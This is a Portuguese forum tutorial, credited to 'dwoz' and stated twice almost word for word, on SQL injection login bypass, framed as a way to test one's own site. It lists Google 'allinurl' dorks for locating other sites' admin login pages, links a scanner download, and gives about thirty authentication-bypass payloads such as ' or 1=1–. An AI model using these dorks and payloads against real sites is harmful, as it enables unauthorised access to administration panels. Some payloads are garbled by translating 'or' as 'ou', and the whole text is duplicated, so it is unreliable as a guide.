Ola pessoal, to postando um tutorial para testar se o site esta protegido contra SQL injection.Muitos colocão ant_injection nos seus sites e não sabem se esta funcionando, então ai vai como testar.
Obs: Nao to ensinando ninguem a hackear e sim a não ser hackiado e tambem não to ensinando ninguem a deixar o site seguro e sim a testar se ele esta seguro, existe varios tutos de como deixar o site ant_SQL injection.
Vamos la...
Bom galera vou explicar SQL injection - método de inserção de strings no banco de dados do servidor - podendo assim liberar os cookies e conseqüentemente a permissão de administrador.
Bem devido a alguns erros em banco de dados dos servidores é possível, ainda hoje, encontrar esse tipo de vulnerabilidade.
SQL Injection vem de injeção de SQL através de strings em campos de login ou senha, depedendo da página vulnerável. Um aliado para descobrir sites com essa vulnerabilidade é o famoso Google que permite pesquisar por páginas visadas a campos de logins
isso nao significa que essas paginas já estejam vulneraveis ok.
para pesquisarmos no google precisamo de um comando chamado allinurl.
esse comando procura especificadamente aquilo que se vem depois dos dois pontos
exemplo: allinurl:/site/admin/
com esse codigo ele caçará paginas com campos de logins de adiministraçoes.
abaixo uma lista com algums codigos para vc pesquisar no google.
allinurl:/webadmin/default.asp
allinurl:/menu_admin/default.asp
allinurl:/menu_admin/index.asp
allinurl:/menu_admin/login.asp
allinurl:/noticias/admin/
allinurl:/news/admin/
allinurl:/cadastro/admin/
allinurl:/portal/admin/
allinurl:/site/admin/
allinurl:/home/admin.asp
allinurl:/home/admin/index.asp
allinurl:/home/admin/default.asp
allinurl:/home/admin/login.asp
allinurl:/web/admin/index.asp
pegue uma das strings acima e pesquise a vontade:
Mais como nos so queremos testar o nosso site não precisa pesquizar no google simplesmente digite a url da pagina de admin do seu site.
após isso saira uma lista de sites com paginas com campos de logins e senhas
ate ai tudo bem agora vamos escaniialos usando um scanner como (acutinex) link para dwonload no final da tuto.
depois de scanniado e acuzando a suposta vulnerabilidade de sql injection
é só testarmos strings nos campos de loginsda pagina afetada.
http://img217.imageshack.us/img217/426/camposio8.gif
a mesma string usada no login deve ser usada no campo de senha ok.
abaixo uma lista de strings:
b’ or ‘ 1=’
‘ or ‘1
‘ or ‘|
‘ or ‘a’='a
‘ or ”=’
‘ or 1=1–
‘) or (’a'=’a
‘ or ‘1′=’1
admin ‘ - -
‘ ou 0=0 –
“ou 0=0 –
ou 0=0 –
‘ ou 0=0 #
“ou 0=0 #
ou 0=0 #
‘ ou ‘ x’='x
“ou” x”=”x
‘) ou (’ x’='x
‘ ou 1=1 –
“ou 1=1 –
ou 1=1 –
‘ ou a=a –
“ou” a”=”a
‘) ou (’ a’='a
“) ou (”a”=”a
hi “ou” a”=”a
hi “ou 1=1 –
hi ‘ ou 1=1 –
hi ‘ ou ‘ a’='a
hi ‘) ou (’ a’='a
hi”) ou (”a”=”a
‘ or ‘x’='x
teste varias strings ate acertar uma que de uma confusao no banco de dados do servidor
assim te dando acesso a pagina da adiministração
[COLOR=#FF0000]Obs.: Lembrado que se der acesso a pagina de administração o seu site esta vulneravel ao SQL injection[/COLOR]
espero que tenham gostado…
Creditos:
by dwoz
================================================== =======
Links para donloads
acutinex:
[CODE]http://w17.easy-share.com/1702782057.html[/CODE] tuto de como usar o acutinex: Código:
[CODE]http://w17.easy-share.com/1702782494.html[/CODE]
Obs: Nao to ensinando ninguem a hackear e sim a não ser hackiado e tambem não to ensinando ninguem a deixar o site seguro e sim a testar se ele esta seguro, existe varios tutos de como deixar o site ant_SQL injection.
Vamos la...
Bom galera vou explicar SQL injection - método de inserção de strings no banco de dados do servidor - podendo assim liberar os cookies e conseqüentemente a permissão de administrador.
Bem devido a alguns erros em banco de dados dos servidores é possível, ainda hoje, encontrar esse tipo de vulnerabilidade.
SQL Injection vem de injeção de SQL através de strings em campos de login ou senha, depedendo da página vulnerável. Um aliado para descobrir sites com essa vulnerabilidade é o famoso Google que permite pesquisar por páginas visadas a campos de logins
isso nao significa que essas paginas já estejam vulneraveis ok.
para pesquisarmos no google precisamo de um comando chamado allinurl.
esse comando procura especificadamente aquilo que se vem depois dos dois pontos
exemplo: allinurl:/site/admin/
com esse codigo ele caçará paginas com campos de logins de adiministraçoes.
abaixo uma lista com algums codigos para vc pesquisar no google.
allinurl:/webadmin/default.asp
allinurl:/menu_admin/default.asp
allinurl:/menu_admin/index.asp
allinurl:/menu_admin/login.asp
allinurl:/noticias/admin/
allinurl:/news/admin/
allinurl:/cadastro/admin/
allinurl:/portal/admin/
allinurl:/site/admin/
allinurl:/home/admin.asp
allinurl:/home/admin/index.asp
allinurl:/home/admin/default.asp
allinurl:/home/admin/login.asp
allinurl:/web/admin/index.asp
pegue uma das strings acima e pesquise a vontade:
Mais como nos so queremos testar o nosso site não precisa pesquizar no google simplesmente digite a url da pagina de admin do seu site.
após isso saira uma lista de sites com paginas com campos de logins e senhas
ate ai tudo bem agora vamos escaniialos usando um scanner como (acutinex) link para dwonload no final da tuto.
depois de scanniado e acuzando a suposta vulnerabilidade de sql injection
é só testarmos strings nos campos de loginsda pagina afetada.
http://img217.imageshack.us/img217/426/camposio8.gif
a mesma string usada no login deve ser usada no campo de senha ok.
abaixo uma lista de strings:
b’ or ‘ 1=’
‘ or ‘1
‘ or ‘|
‘ or ‘a’='a
‘ or ”=’
‘ or 1=1–
‘) or (’a'=’a
‘ or ‘1′=’1
admin ‘ - -
‘ ou 0=0 –
“ou 0=0 –
ou 0=0 –
‘ ou 0=0 #
“ou 0=0 #
ou 0=0 #
‘ ou ‘ x’='x
“ou” x”=”x
‘) ou (’ x’='x
‘ ou 1=1 –
“ou 1=1 –
ou 1=1 –
‘ ou a=a –
“ou” a”=”a
‘) ou (’ a’='a
“) ou (”a”=”a
hi “ou” a”=”a
hi “ou 1=1 –
hi ‘ ou 1=1 –
hi ‘ ou ‘ a’='a
hi ‘) ou (’ a’='a
hi”) ou (”a”=”a
‘ or ‘x’='x
teste varias strings ate acertar uma que de uma confusao no banco de dados do servidor
assim te dando acesso a pagina da adiministração
[COLOR=#FF0000]Obs.: Lembrado que se der acesso a pagina de administração o seu site esta vulneravel ao SQL injection[/COLOR]
espero que tenham gostado…
Creditos:
by dwoz
================================================== =======
Links para donloads
acutinex:
[CODE]http://w17.easy-share.com/1702782057.html[/CODE] tuto de como usar o acutinex: Código:
[CODE]http://w17.easy-share.com/1702782494.html[/CODE]